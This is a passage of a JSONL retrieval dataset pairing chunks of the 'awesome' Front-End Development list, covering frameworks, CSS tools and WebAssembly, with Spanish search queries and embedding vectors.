0.05888, -0.03623, -0.0565, 0.11614, 0.11693, -0.02438, -0.04043, 0.10621, 0.05144, -0.03662, -0.04294, -0.08597, 0.01935, -0.01187, -0.03182, 0.03297, -0.04294, -0.02253, 0.0027, 0.06171, -0.0248, -0.03718, -0.02065, -0.07514, 0.0212, 0.04996, 0.08101, 0.03804, -0.01549, -0.0434, -0.01013, -0.14035, 0.08078, 0.0144, -0.03905, 0.06607, -0.08038, 0.06162, -0.02773, 0.02623, -0.0298, 0.00591, -0.10267, -0.05049, 0.05951, -0.04276, -0.0698, -0.03696, 0.00923, -0.03647, 0.01285, 0.02518, -0.01256, 0.0295, 0.03355, 0.03379, 0.11085, -0.00141, -0.00207, -0.05541, -0.03595, -0.02111, 0.05972, -0.02036, 0.06278, 0.03171, -0.03489, 0.02187, -0.00373, 0.06094, 0.09145, -0.01995, -0.03563, 0.00685, -0.00977, 0.02089, -0.07233, -0.11644, 0.05323, 0.01143, 0.00602, 0.03369, -0.02864, -0.06807, -0.03246, -0.06955, -0.04718, -0.05752, 0.0619, -0.05669, 0.09487, -0.00532, 0.02771, 0.04162, -0.09264, -0.06041, -0.03183, 0.0755, 0.06262, 0.00506, 0.0504, -0.0043, -0.00055, 0.04402, -0.01147, -0.03891, -0.04747, 0.00981, -0.07566, -0.0437, 0.03492, -0.03744, -0.0119, -0.03918, -0.07111, -0.05936, 0.03276, 0.03978, 0.05357, -0.06614, 0.12222, 0.00475, 0.01138, 0.05014, -0.083, 0.06662, 0.03374, -0.08012, -0.09064, 0.00475, 0.0036, 0.01924, -0.04107, 0.0492, 0.03688, -0.02515, 0.1072, 0.03277, 0.04026, 0.03106, -0.03531, 0.06653, -0.01814, -0.03256, 0.02308, 0.04178, -0.02216, 0.0708, -0.01552, 0.00244, 0.0305, 0.02014, -0.0243, 0.07873, 0.01892, 0.01987, 0.00626, -0.00935, 0.01383, 0.04412, -0.00423, -0.0287, 0.00517, 0.02622, 0.0355, 7e-05, -0.0438, -0.03205, -0.08737, -0.04925, 0.10922, -0.02248, -0.02861, 0.02998, -0.12138, -0.09771, -0.01518, -0.06329, -0.10454, -0.0236, 0.05354, 0.06617, -0.04508, -0.00126, -0.05749]} -{"tipo": "pregunta", "herramienta": "Front-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Front-End Development", "tema": "front-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Front-End Development: Cycle.js β€” Functional and reactive JavaScript framework. Text Editing. Motion UI Design. Vue.js β€” App framework. Marionette.js β€” App framework. Aurelia β€” App framework. Charting. Ionic Framework. Chrome DevTools. PostCSS β€” CSS tool. Draft.js β€” Rich text editor framework for React. Service Workers. Progressive Web Apps. choo β€” App framework. Redux β€” State container for JavaScript apps. Browserify β€” Module bundler. Sass β€” CSS preprocessor. Ant Design β€” Enterprise-class UI design language. Less β€” CSS preprocessor. WebGL β€” JavaScript API for rendering 3D graphics. Preact β€” App framework. Progressive Enhancement. Next.js β€” Framework for server-rendered React apps. lit β€” Library for building web components with a declarative template system. JAMstack β€” Modern web development architecture based on client-side JavaScript, reusable APIs, and prebuilt markup. WordPress-Gatsby β€” Web development technology stack with WordPress as a back end and Gatsby as a front end. Mobile Web Development β€” Creating a great mobile web experience.", "indexar": "cual es una alternativa libre o moderna para construir sitios web que se adapten a mΓ³viles?", "v": [-0.06604, 0.10545, -0.14619, -0.04729, -0.07372, 0.02798, -0.07919, -0.02759, -0.14848, -0.04629, -0.06879, -0.12683, 0.01266, 0.02165, 0.11825, -0.06661, 0.08394, -0.08774, 0.05915, -0.07816, -0.06717, 0.00106, -0.02042, -0.02921, 0.0308, -0.05304, 0.08043, -0.03407, -0.09879, 0.01007, 0.0776, 0.06632, 0.09064, 0.08914, -0.04065, -0.01771, 0.0961, 0.05234, -0.01561, -0.14149, -0.01982, -0.06696, -0.06986, 0.06846, -0.00245, -0.04105, -0.11172, -0.07195, -0.09379, 0.03344, -0.07992, 0.05274, -0.07272, 0.01663, 0.0653, 0.02821, 0.19387, -0.18334, 0.02385, -0.04026, -0.12973, 0.1155, -0.03835, 0.00557, 0.0777, 0.01304, -0.08204, 0.09288, -0.12653, -0.07589, 0.08637, -0.06423, 0.07796, 0.01491, 0.03047, 0.06492, -0.07907, -0.04417, -0.03318, 0.03433, 0.06189, -0.06392, -0.09953, -0.01684, -0.02801, 0.01169, -0.00408, -0.1168, -0.03298, 0.02087, 0.16925, 0.01368, -0.02352, 0.05452, -0.06, -0.19078, 0.07261, 0.01027, 0.09071, 0.0769, -0.02236, -0.03135, -0.07879, 0.00355, 0.00092, 0.03776, 0.04799, 0.01646, -0.04195, -0.04113, -0.00681, 0.00166, 0.01246, -0.0052, 0.04006, -0.00787, 0.00217, 0.00128, -0.01508, -0.02002, -0.07441, -0.04649, -0.05106, -0.06697, -0.07062, 0.00809, 0.0692, 0.04714, 0.00453, 0.03113, 0.0397, -0.07902, -0.04504, -0.096, -0.08732, 0.02802, 0.13088, 0.00653, 0.05871, -0.03301, 0.02364, 0.01565, -0.05657, -0.03961, -0.02188, -0.01454, 0.01077, -0.00088, -0.07427, -0.01329, -0.10928, 0.08224, -0.03651, 0.12158, -0.08277, 0.02877, -0.06361, -0.06666, -0.0495, 0.15615, 0.01597, -0.01733, 0.02495, -0.00859, -0.00935, -0.06586, -0.07432, 0.13125, 0.02137, 0.03987, 0.05459, 0.04467, 0.0564, -0.08934, 0.0432, -0.01242, -0.04248, 0.00668, 0.03267, -0.06724, -0.00435, 0.00462, -0.15745, -0.0224, -0.03241, -0.06602, 0.01311, -0.01605, -0.00101, 0.00681, -0.00957, 0.0329, -0.04149, 0.02401, 0.01531, -0.01129, 0.00115, -0.03657, 0.04112, -0.04493, -0.04437, -0.0634, -0.02002, -0.04548, -0.04502, 0.08588, -0.01606, 0.01602, -0.02238, 0.04297, 0.05142, -0.06159, 0.05689, -0.02242, -0.04457, -0.0823, 0.06094, -0.00555, -0.05212, -0.0027, 0.05271, -0.01645, -0.02176, -0.00186, -0.02047, 0.06494, 0.00275, 0.00729, -0.00895, -0.01523, -0.02779, -0.00999, -0.02472, 0.02477, 0.02148, 0.03569, 0.01711, 0.01503, -0.11923, -0.0299, 0.05043, 0.07944, -0.06205, 0.0254, -0.00923, -0.07303, -0.09606, -0.01003, -0.01721, -0.07597, -0.08877, 0.02066, 0.0198, -0.00393, 0.04487, 0.01233]} -{"tipo": "pregunta", "herramienta": "Front-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Front-End Development", "tema": "front-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Front-End Development: Storybook β€” Development environment for UI components. Blazor β€” NET web framework using C#/Razor and HTML that runs in the browser with WebAssembly. PageSpeed Metrics β€” Metrics to help understand page speed and user experience. Tailwind CSS β€” Utility-first CSS framework for rapid UI development. Seed β€” Rust framework for creating web apps running in WebAssembly. Web Performance Budget β€” Techniques to ensure certain performance metrics for a website. Web Animation β€” Animations in the browser with JavaScript, CSS, SVG, etc. Yew β€” Rust framework inspired by Elm and React for creating multi-threaded frontend web apps with WebAssembly. Material-UI β€” Material Design React components for faster and easier web development. Building Blocks for Web Apps β€” Standalone features to be integrated into web apps. Svelte β€” App framework. Design systems β€” Collection of reusable components, guided by rules that ensure consistency and speed. Inertia.js β€” Make single-page apps without building an API.", "indexar": "que herramienta sirve para desarrollar entornos de diseΓ±o de componentes de interfaz", "v": [0.09927, 0.05493, -0.19437, -0.31826, 0.13041, -0.13018, -0.10147, 0.03113, -0.01284, -0.05037, -0.05174, -0.05047, -0.13222, -0.13855, 0.08528, 0.04742, 0.12973, -0.16939, -0.08897, 0.00381, -0.01506, 0.04085, -0.13845, -0.0321, -0.10645, 0.011, 0.00418, -0.08259, -0.14375, 0.03673, 0.00492, -0.03562, 0.10057, 0.00261, -0.13842, -0.19296, -0.01933, 0.00756, 0.01481, 0.02281, 0.02993, 0.01888, -0.09319, 0.06745, 0.07713, 0.05335, -0.04008, 0.00071, 0.0025, 0.06934, -0.05751, -0.08321, -0.01497, 0.0439, 0.05452, -0.16315, 0.19123, -0.16401, 0.10517, -0.08528, -0.10802, 0.03613, -0.06532, -0.06447, 0.0373, -0.10939, -0.13518, -0.02403, 0.00124, 0.00245, -0.0256, -0.00752, 0.05695, -0.11627, 0.01313, 0.05466, -0.03945, 0.05488, 0.07429, 0.04124, 0.0758, 0.01815, -0.082, -0.00468, -0.02205, 0.00929, 0.07429, 0.03251, -0.01623, -0.02047, -0.00216, 0.03777, -0.02521, -0.04465, 0.00192, -0.00831, 0.03534, 0.04282, 0.0917, -0.02283, 0.06182, -0.04055, -0.06825, 0.03757, -0.02542, 0.00511, 0.01841, -0.04031, -0.04788, -0.02853, 0.03938, 0.04465, 0.04536, 0.00543, -0.05014, -0.01952, 0.03554, -0.0052, -0.0045, -0.07139, 0.03108, 0.01821, -0.02521, -0.01507, -0.01492, 0.04671, -0.0522, 0.07442, 0.01363, -0.07377, -0.01791, -0.07759, -0.06174, 0.03872, -0.02936, 0.02837, -0.01895, -0.08477, 0.00243, -0.0308, 0.08715, 0.0444, 0.00109, -0.04949, -0.02345, 0.03936, 0.06618, -0.05102, -0.05032, 0.04202, 0.01785, -0.0042, 0.00652, -0.03239, -0.12157, -0.0246, -0.0389, 0.03918, -0.05896, 0.00462, -0.0789, 0.03676, -0.01283, 0.06522, 0.03962, -0.07445, -0.01846, 0.00239, 0.08391, 0.07868, 0.04514, -0.02728, 0.0816, -0.04455, -0.01455, 0.0067, -0.02071, -0.03576, -0.04166, -0.06127, -0.03377, 0.03689, -0.03939, 0.03106, -0.04523, -0.05292, 0.01482, -0.0121, -0.03246, 0.01045, -0.0565, 0.08328, 0.01222, -0.00447, 0.05842, 0.01768, 0.01206, -0.03484, -0.04992, -0.06348, 0.02401, 0.02248, 0.0242, -0.08771, 0.00573, 0.09705, 0.00223, 0.02322, -0.00496, 0.06458, 0.06345, -0.02297, 0.01466, 0.04826, -0.02358, -0.00201, 0.0605, 0.0135, 0.05617, -0.01431, -0.02651, -0.00337, 0.01799, -0.01361, 0.0258, -0.02662, -0.01185, -0.00681, 0.01661, -0.05521, 0.03163, -0.02699, -0.03633, -0.01259, -0.01427, -0.02852, 0.01244, -0.04385, -0.03978, -0.06755, -0.03419, 0.03926, -0.0128, -0.03974, -0.02633, -0.04729, -0.03621, -0.06316, -0.01048, -0.07929, -0.04446, 0.00129, 0.05447, -0.0168, 0.01266, 0.00627]} -{"tipo": "pregunta", "herramienta": "Front-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Front-End Development", "tema": "front-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Front-End Development: Storybook β€” Development environment for UI components. Blazor β€” NET web framework using C#/Razor and HTML that runs in the browser with WebAssembly. PageSpeed Metrics β€” Metrics to help understand page speed and user experience. Tailwind CSS β€” Utility-first CSS framework for rapid UI development. Seed β€” Rust framework for creating web apps running in WebAssembly. Web Performance Budget β€” Techniques to ensure certain performance metrics for a website. Web Animation β€” Animations in the browser with JavaScript, CSS, SVG, etc. Yew β€” Rust framework inspired by Elm and React for creating multi-threaded frontend web apps with WebAssembly. Material-UI β€” Material Design React components for faster and easier web development. Building Blocks for Web Apps β€” Standalone features to be integrated into web apps. Svelte β€” App framework. Design systems β€” Collection of reusable components, guided by rules that ensure consistency and speed. Inertia.js β€” Make single-page apps without building an API.", "indexar": "con quΓ© marco puedo crear aplicaciones web rΓ‘pidas usando Rust y WebAssembly", "v": [-0.07172, 0.04618, -0.16296, -0.19634, -0.01535, -0.01075, -0.11087, -0.05699, -0.0181, -0.0081, -0.16041, -0.19669, -0.0174, -0.05703, 0.05984, 0.0403, -0.02742, -0.00127, 0.02754, -0.04454, 0.015, -0.13899, -0.16094, 0.00682, -0.04308, 0.02325, 0.06384, -0.02895, -0.10071, -0.02975, 0.02045, 0.06832, 0.03877, -0.00701, -0.1761, -0.05913, 0.11289, 0.00229, 0.02912, 0.02583, -0.00663, 0.01825, -0.08881, 0.05408, -0.03238, 0.08381, 0.01507, -0.19531, -0.09553, 0.01831, -0.04459, -0.06948, -0.17357, 0.01618, -0.06734, -0.08488, 0.15477, -0.20528, 0.04258, -0.05282, -0.06942, 0.06815, -0.03149, 0.02534, 0.00469, -0.02206, 0.01573, 0.08919, -0.06251, 0.10757, 0.01081, -0.00897, 0.10862, -0.02933, 0.1678, 0.08901, -0.08621, 0.00941, -0.01, -0.01287, -0.00281, -0.04108, -0.02114, -0.07191, -0.06251, -0.01195, 0.00131, -0.06699, 0.01316, -0.04939, 0.11326, 0.08925, -0.00425, 0.04282, 0.00505, -0.1195, 0.11419, 0.00215, 0.1074, 0.0179, -0.10496, -0.06636, -0.16281, 0.03177, -0.03613, 0.01671, 0.05156, -0.0231, -0.06976, -0.00468, 0.01116, -0.06997, -0.07929, -0.01461, -0.00135, 0.01453, 0.08206, -0.09327, -0.05131, -0.04577, -0.03306, -0.0185, -0.03136, 0.02866, 0.00492, 0.03831, 0.02678, 0.10334, -0.08687, -0.01948, 0.02405, -0.12588, -0.12825, -0.06368, -0.00682, 0.03267, 0.02173, 0.03062, 0.0404, 0.01436, 0.01444, -0.05268, -0.0461, 0.02469, -0.00472, 0.0219, 0.01962, -0.02223, -0.02576, 0.02374, -0.00713, -0.00305, -0.0268, 0.00505, -0.14074, -0.0551, -0.05927, -0.0717, -0.04887, 0.00048, -0.07004, 0.06856, -0.01681, -0.03412, -0.04519, -0.00706, -0.06565, 0.03175, 0.08017, 0.071, -0.01073, 0.07314, 0.00976, -0.10476, 0.10299, 0.00891, -0.01191, 0.00395, -0.01004, -0.05587, -0.03838, -0.09509, 0.00352, 0.03445, -0.04233, -0.02679, 0.00325, 0.03394, -0.02609, 0.05731, -0.05495, 0.06713, -0.00709, 0.02542, 0.02901, 0.00037, -0.01007, -0.06056, -0.03565, -0.05424, -0.04637, -0.04035, -0.00735, -0.02893, -0.00393, 0.03849, -0.0039, 0.01925, -0.0089, 0.05687, 0.00213, 0.05528, 0.04239, -0.004, -0.00196, -0.00752, 0.04156, 0.02624, -0.05345, -0.01372, 0.00658, -0.02538, -0.0544, 0.03131, 0.04754, 0.04757, -2e-05, -0.03315, -0.00478, 0.00621, 0.0212, -0.07747, -0.0343, -0.09188, -0.02681, -0.0178, -0.00863, 0.00266, -0.04323, 0.01476, -0.00923, 0.02919, -0.02673, 0.01245, -0.01732, -0.02123, -0.07401, 0.00279, -0.04248, -0.01623, -0.0375, -0.00025, 0.04699, -0.03558, 0.01629, 0.03844]} -{"tipo": "pregunta", "herramienta": "Front-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Front-End Development", "tema": "front-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Front-End Development: Storybook β€” Development environment for UI components. Blazor β€” NET web framework using C#/Razor and HTML that runs in the browser with WebAssembly. PageSpeed Metrics β€” Metrics to help understand page speed and user experience. Tailwind CSS β€” Utility-first CSS framework for rapid UI development. Seed β€” Rust framework for creating web apps running in WebAssembly. Web Performance Budget β€” Techniques to ensure certain performance metrics for a website. Web Animation β€” Animations in the browser with JavaScript, CSS, SVG, etc. Yew β€” Rust framework inspired by Elm and React for creating multi-threaded frontend web apps with WebAssembly. Material-UI β€” Material Design React components for faster and easier web development. Building Blocks for Web Apps β€” Standalone features to be integrated into web apps. Svelte β€” App framework. Design systems β€” Collection of reusable components, guided by rules that ensure consistency and speed. Inertia.js β€” Make single-page apps without building an API.", "indexar": "cual es una alternativa libre a React para desarrollo frontend", "v": [-0.03559, 0.02364, -0.09733, -0.06981, 0.01707, 0.02743, -0.01944, 0.00642, -0.15295, 0.02258, -0.06627, -0.24656, -0.14697, -0.08619, 0.10333, 0.0076, -0.03069, -0.04564, 0.09079, -0.04181, -0.10666, -0.0501, -0.11212, -0.08627, 0.07997, 0.00434, 0.05724, 0.08203, 0.06125, -0.01862, 0.11523, 0.00167, 0.06754, 0.09374, -0.05619, -0.01441, 0.21772, 0.04912, 0.06722, -0.00378, -0.06479, -0.04502, -0.09306, 0.05064, -0.02566, -0.04647, -0.04797, -0.00694, -0.05075, 0.03889, -0.04221, 0.00936, -0.06342, 0.05134, 0.16945, 0.01553, 0.06718, -0.17759, -0.09595, -0.02398, -0.08897, 0.09069, 0.08908, -0.13496, 0.0608, -0.13398, -0.08146, 0.05557, -0.06954, 0.08586, 0.01231, 0.00409, 0.03508, -0.0267, -0.1049, 0.10363, -0.06908, 0.00409, -0.04162, 0.0874, -0.0243, -0.04882, -0.05038, 0.10337, -0.0024, -0.1237, 0.05919, -0.0786, -0.03247, 0.08247, 0.02009, -0.04723, -0.08886, 0.03488, -0.01419, -0.13182, 0.04022, 0.06496, -0.00033, -0.04469, -0.01822, -0.01418, -0.07156, -0.08128, 0.07794, -0.00893, 0.04571, -0.0251, -0.10925, 0.00916, 0.00021, 0.06016, 0.0461, 0.01962, -0.03465, 0.00024, -0.0346, 0.04475, 0.0629, -0.04235, -0.05092, 0.0149, -0.04478, -0.04756, 0.0, 0.04701, 0.02864, 0.07112, -0.0974, 0.04703, 0.03256, -0.10538, 0.01953, -0.06993, -0.08678, 0.04362, 0.12533, 0.01089, 0.07025, 0.00966, -0.0036, 0.01742, 0.03192, 0.03632, 0.01007, -0.0404, 0.00204, -0.02833, -0.03161, -0.01693, -0.06851, 0.0401, 0.02589, 0.07134, -0.12275, 0.01691, -0.02677, 0.00899, -0.01732, 0.09499, -0.0073, -0.00191, -0.01007, 0.02504, -0.00809, -0.02195, -0.01568, 0.01822, -0.02057, 0.00178, 0.02567, 0.04401, 0.09718, -0.12557, 0.08214, -0.03004, -0.05149, -0.06289, -0.016, -0.10142, 0.07759, 0.03644, -0.10628, 0.02757, -0.03029, -0.08002, -0.05335, -0.03389, -0.02831, 0.04258, -0.09338, 0.01576, -0.0293, -0.10886, 0.00067, 0.01074, -0.00157, -0.1004, -0.05659, -0.02963, -0.0189, -0.01946, 0.01096, -0.04373, -0.03916, -0.00863, -0.0191, 0.01866, 0.00571, 0.0464, 0.05213, 0.02986, 0.09208, 0.10301, -0.00611, -0.03681, 0.03965, 0.02059, 0.01454, -0.0301, 0.03215, -0.02469, 0.01618, 0.007, 0.03656, 0.02709, 0.04678, 0.06108, -0.02275, -0.0105, 0.02594, -0.02578, -0.00404, -0.04607, 0.0137, 0.00228, -0.0039, 0.02449, -0.00646, -0.04387, 0.08201, 0.03408, -0.04463, -0.01078, -0.04976, 0.00069, -0.09654, -0.05633, -0.02759, -0.08029, -0.05372, -0.00934, -0.01697, 0.00395, 0.04541, 0.02332]} -{"tipo": "pregunta", "herramienta": "Front-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Front-End Development", "tema": "front-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Front-End Development: MDBootstrap β€” Templates, layouts, components, and widgets to rapidly build websites. Master CSS β€” A virtual CSS language with enhanced syntax. Hydrogen β€” Edge-first framework for building Shopify storefronts with React. Tiny JS β€” Frontend libraries that fit into 2 kB with dependencies. Frontend GIS β€” Geographic Information Systems (GIS) for web browsers. WebGPU β€” JavaScript API for rendering and compute on GPUs. WebAssembly β€” A portable binary format for running code efficiently across platforms.", "indexar": "quΓ© herramientas me sirven para diseΓ±ar plantillas de sitios web rΓ‘pidamente?", "v": [0.21372, 0.08301, -0.17995, -0.16328, 0.09508, -0.08284, -0.00534, -0.11649, 0.02965, -0.04752, 0.02727, 0.027, -0.04031, -0.18141, 0.09301, 0.02437, 0.08276, -0.12674, 0.09428, -0.04491, -0.03615, -0.01127, -0.15603, 0.00279, -0.11574, -0.13734, 0.13493, -0.03523, -0.22853, 0.14294, 0.03357, 0.0421, 0.01134, 0.00497, -0.07546, -0.08159, -0.01474, 0.06382, -0.04557, -0.07265, -0.03577, 0.01264, -0.06565, 0.05757, -0.03484, 0.01501, -0.04791, -0.0686, -0.01584, 0.08348, -0.05981, -0.01474, -0.02076, -0.02587, 0.04002, -0.06529, 0.2427, -0.10767, 0.05974, -0.07634, -0.0933, -0.01469, 0.01254, 0.05349, 0.01314, 0.01107, -0.08093, -0.02673, -0.07192, -0.03272, -0.01977, -0.01081, 0.1195, -0.10765, 0.0865, -0.05035, 0.00716, 0.03441, 0.03868, 0.02812, 0.01632, -0.05123, -0.07958, -0.02324, -0.0665, 0.04067, -0.04043, -0.00288, -0.01498, -0.09533, 0.08885, 0.04487, -0.10522, -0.00641, -0.11563, -0.06112, 0.11911, 0.03223, 0.08715, 0.0213, -0.05027, -0.04949, -0.06762, -0.00839, -0.00883, 0.07006, 0.05358, -0.01078, -0.02611, -0.00456, 0.01635, -0.00382, 0.00801, -0.04918, -0.04435, -0.03173, 0.04944, -0.03018, -0.03198, -0.03896, -0.01322, 0.01167, -0.03156, -0.00148, -0.02978, 0.01955, 0.00154, 0.03158, -0.03813, -0.09125, -0.03485, -0.10607, -0.09324, 0.03969, -0.00235, 0.05627, 0.05438, -0.03553, 0.03838, -0.06276, 0.02608, 0.01742, -0.07376, 0.00794, -0.00709, 0.00279, 0.01901, -0.04345, -0.08286, 0.00524, -0.05827, 0.05388, 0.06923, -0.01719, -0.08423, -0.05371, -0.06516, -0.01569, -0.07568, 0.04866, -0.0604, 0.07761, 0.04752, 0.05128, 0.02409, -0.04177, -0.01243, 0.06471, 0.0887, 0.06673, 0.08735, 0.07609, 0.00169, -0.07079, 0.05028, -0.0071, -0.06033, -0.04184, -0.01513, -0.02752, -0.01328, -0.00244, -0.0508, 0.02488, -0.02878, -0.03858, 0.0588, -0.00518, -0.02361, 0.06793, -0.05738, 0.04113, 0.00126, 0.0069, 0.07157, 0.0454, 0.02601, 0.0125, -0.01664, -0.09593, -0.02784, -0.04163, -0.01281, -0.05326, 0.00488, 0.05907, -0.03241, -0.01118, -0.05024, 0.07087, 0.01023, -0.02176, 0.05292, -0.0863, 0.01073, -0.02447, 0.04632, -0.02586, 0.02536, -0.0162, 0.05561, 0.01086, 0.0199, -0.01496, 0.04176, 0.06161, 0.03113, -0.0131, 0.00399, 0.03083, 0.02466, -0.05802, -0.06522, 0.00362, -0.00663, -0.04519, -0.01665, -0.01757, -0.07851, -0.0178, -0.0255, 0.05085, -0.03305, -0.02236, 0.03429, -0.12095, -0.04293, -0.09462, -0.03353, -0.02808, -0.07511, 0.01722, 0.03137, -0.01768, -0.00091, -0.03902]} -{"tipo": "pregunta", "herramienta": "Front-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Front-End Development", "tema": "front-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Front-End Development: MDBootstrap β€” Templates, layouts, components, and widgets to rapidly build websites. Master CSS β€” A virtual CSS language with enhanced syntax. Hydrogen β€” Edge-first framework for building Shopify storefronts with React. Tiny JS β€” Frontend libraries that fit into 2 kB with dependencies. Frontend GIS β€” Geographic Information Systems (GIS) for web browsers. WebGPU β€” JavaScript API for rendering and compute on GPUs. WebAssembly β€” A portable binary format for running code efficiently across platforms.", "indexar": "ΒΏhay algΓΊn lenguaje o sistema que mejore la escritura de CSS?", "v": [-0.09104, 0.04083, 0.02175, -0.04337, -0.14648, -0.29908, -0.10344, 0.00227, 0.06019, 0.01115, -0.12524, 0.02128, -0.09258, -0.04663, 0.1, -0.01578, 0.14651, 0.02678, -0.01593, -0.10512, -0.00715, -0.13428, -0.15405, 0.01177, -0.02073, -0.09353, -0.02202, -0.10456, -0.06909, 0.11935, -0.09396, 0.15336, 0.09944, 0.03098, -0.09076, 0.11436, -0.0259, 0.07797, -0.04535, 0.12255, 0.04885, -0.04418, -0.0288, 0.07002, -0.04216, -0.07209, -0.00954, 0.02479, -0.00659, -0.0975, -0.02138, -0.00155, -0.08189, -0.01225, 0.03323, 0.07393, 0.08792, -0.08338, -0.001, -0.13598, -0.00093, 0.10814, -0.04203, -0.04329, 0.00556, -0.03592, 0.00509, -0.09387, 0.01896, 0.02938, 0.06314, 0.00059, -0.05247, 0.03047, 0.11775, 0.08332, -0.00254, -0.02719, 0.06631, 0.09179, -0.00897, -0.00637, -0.14128, 0.03956, -0.03531, 0.06417, -0.01413, -0.13151, -0.04924, 0.00252, 0.0511, -0.05098, -0.1185, -0.11598, -0.05446, -0.03815, -0.04238, -0.09727, 0.06246, 0.06671, 0.05484, -0.10647, -0.05009, 0.01428, -0.01376, 0.06219, 0.08157, -0.01588, 0.05539, -0.02219, 0.07476, 0.02659, -0.01346, -0.03451, -0.08513, -0.03669, 0.10773, -0.00563, 0.01841, -0.06255, -0.05197, 0.02885, -0.05773, -0.07824, 0.12494, 0.0661, 0.05015, 0.02907, -0.03773, 0.10219, -0.03226, -0.03523, 0.02187, -0.0317, -0.07351, 0.0823, 0.10295, 0.06417, 0.00398, 0.08421, -0.06797, 0.04487, -0.02167, 0.00874, 0.04868, -0.02022, 0.0427, -0.0804, -0.07833, -0.02734, -0.04925, 0.03447, 0.05855, 0.03969, -0.05718, -0.02186, 0.06515, -0.02749, -0.01887, 0.00659, -0.01627, -0.02075, -0.00916, 0.03442, -0.04106, -0.02014, -0.0553, -0.00549, 0.09342, -0.01472, 0.06203, -0.03272, 0.05705, -0.01603, -0.00562, 0.01866, 0.02793, 0.00357, -0.05171, -0.04193, -0.0655, 0.0074, -0.0705, -0.01437, 0.0572, 0.01731, 0.0088, 0.00365, -0.06846, -0.05324, 0.01708, 0.04421, -0.07264, -0.10128, -0.02796, -0.05647, -0.04978, -0.03584, 0.08204, -0.01822, -0.03776, 0.02782, 0.12738, -0.03319, -0.02279, 0.06924, 0.05198, -0.02263, 0.0106, 0.0524, 0.05142, 0.00307, -0.02751, 0.0325, -0.00541, 0.05202, -0.03661, 0.07503, -0.0018, -0.07387, 0.05748, 0.01063, 0.02271, -0.01508, 0.03046, -0.05968, -0.02127, 0.04741, 0.05829, 0.04496, -0.03772, -0.05536, 0.01412, 0.00258, 0.01344, 0.01539, -0.02081, -0.01996, 0.00573, -0.05815, 0.02749, 0.06391, -0.02046, -0.04677, -0.04974, -0.04107, -0.05899, -0.03887, -0.01269, -0.01848, 0.0207, -0.05458, -0.00502, -0.03464, -0.0036, 0.02506]} -{"tipo": "pregunta", "herramienta": "Front-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Front-End Development", "tema": "front-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Front-End Development: MDBootstrap β€” Templates, layouts, components, and widgets to rapidly build websites. Master CSS β€” A virtual CSS language with enhanced syntax. Hydrogen β€” Edge-first framework for building Shopify storefronts with React. Tiny JS β€” Frontend libraries that fit into 2 kB with dependencies. Frontend GIS β€” Geographic Information Systems (GIS) for web browsers. WebGPU β€” JavaScript API for rendering and compute on GPUs. WebAssembly β€” A portable binary format for running code efficiently across platforms.", "indexar": "con quΓ© puedo crear grΓ‘ficos geogrΓ‘ficos para navegadores web?", "v": [0.16494, 0.03818, 0.04405, -0.03943, 0.05676, -0.0029, 0.14769, -0.04853, 0.0159, -0.09135, -0.01253, -0.02477, -0.11915, -0.02522, 0.03971, 0.05221, 0.04417, -0.08542, 0.00074, 0.0396, -0.03113, -0.02908, 0.03367, -0.10638, -0.06986, -0.13028, 0.01705, -0.08973, -0.08424, 0.04039, -0.07613, 0.04644, -0.05211, -0.01716, -0.13553, -0.0015, 0.1158, -0.00859, -0.05117, -0.09704, 0.00404, -0.09116, -0.10534, 0.01112, -0.01199, -0.00994, -0.05432, -0.09039, -0.04135, -0.12534, 0.05307, 0.02813, -0.17258, 0.02628, 0.01, -0.03527, 0.20886, -0.13731, -0.03208, -0.00133, 0.00921, 0.11331, 0.02796, 0.01946, -0.02522, -0.07946, 0.01735, 0.03865, -0.0124, -0.00379, 0.06697, 0.00678, 0.03848, -0.01619, 0.14889, 0.08935, -0.08781, 0.02285, 0.05523, -0.01527, 0.06501, 0.03287, -0.11254, -0.05816, -0.10109, -0.07354, -0.07472, -0.05359, 0.02857, -0.18137, 0.05696, 0.04973, -0.03617, -0.01872, -0.08664, -0.04105, 0.09176, -0.05798, 0.04964, 0.04479, -0.05408, -0.00258, -0.11952, 0.12317, 0.09667, 0.01667, 0.04053, -0.04396, -0.11457, -0.00888, 0.07137, -0.00628, -0.0556, -0.01101, 0.03481, 0.0041, 0.03473, 0.01266, 0.05382, -0.145, -0.03275, 0.01312, -0.08835, 0.04076, -0.07258, 0.05127, -0.01767, 0.07121, 0.01703, 0.05962, 0.003, -0.05886, -0.01622, -0.03207, -0.04675, 0.08646, -0.01763, -0.08523, 0.08664, 0.02055, 0.00032, 0.03726, -0.02481, -0.02582, 0.04192, 0.09366, 0.01127, -0.03327, -0.10038, -0.08832, -0.03094, 0.00706, -0.05354, 0.01282, 0.01318, 0.0115, -0.01176, -0.04228, -0.05641, 0.00133, 0.07361, 0.11998, -0.00706, 0.10303, 0.00612, -0.04557, -0.15829, -0.0029, 0.09448, 0.05247, -0.03381, 0.08901, 0.02453, -0.14126, 0.04471, -0.00369, -0.08848, 0.00038, -0.00104, -0.05543, -0.00147, -0.05136, 0.04424, 0.03654, -0.13633, -0.05528, 0.00989, -0.03332, -0.00576, 0.04858, -0.00794, 0.02995, -0.01146, 0.04814, 0.07481, -0.04234, 0.03638, 0.00211, -0.04904, -0.07971, 0.02848, -0.03121, 0.01644, -0.07169, 0.02774, 0.06652, 0.02215, 0.08971, 0.01142, 0.01243, -0.00569, -0.08615, 